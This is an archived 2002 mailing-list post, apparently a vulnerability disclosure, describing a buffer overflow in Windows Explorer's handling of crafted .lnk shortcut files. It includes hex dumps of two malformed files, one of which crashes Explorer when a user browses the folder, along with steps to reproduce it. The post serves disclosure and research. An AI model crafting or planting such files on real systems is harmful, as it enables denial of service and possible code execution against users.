Windows .lnk Files

From: Brett Moore (brettat_private)
Date: Tue Jun 25 2002 - 16:40:48 PDT

  • Next message: Syzop: "Re: Apache vulnerability checking"

    It seems that the handling of .lnk files has a few problems. I have tested
    on both win98 and win2000 sp2 server.
    
    Can anyone test further. Note that the actions taken by these .lnk files has
    the possiblity of causing damage to a system and should not be tested on an
    essential server :-)
    
    -------------------------------------------------------------------
    32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
    FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    -------------------------------------------------------------------
    
    This causes FF FF to be loaded into a register used to control the length of
    data copied. Usually causes an error when right clicking on the file in
    explorer. Sometimes it is required
    to select properties. Errors seen include unable to read, unable to write.
    Since we are controlling the length of the data copies these errors are self
    explanatory.
    
    Would seeme that explorer/shell32.dll is copying to much data when reading
    the filename?. Ok so
    this causes the read/write errors and halts progress.
    
    But if we substitute valid values such as 01 01 (CC CC)  then the buffer
    still gets overflowed but we bypass this error and our corrupt values get
    further down in the program.
    
    -------------------------------------------------------------------
    32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
    CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
    AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    -------------------------------------------------------------------
    
    This one does not cause the read/write errors but causes a DoS in explorer
    just by browsing to the folder holding the file.
    
    This is more interesting, but involves tracking a lot of assembler code.
    Worst result would be some sort of code executed just by browsing a folder.
    Virus related perhaps.
    
    Any feedback on results or further research into this problem would be
    appreciated.
    
    Notes:
    	Do not save to your desktop.
    	Rename the file to .lnk
    	This is the win98 file. You can easily modify a 2000 or other lnk file as
    detailed above.
    
    
    Brett Moore
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 09:52:52 PDT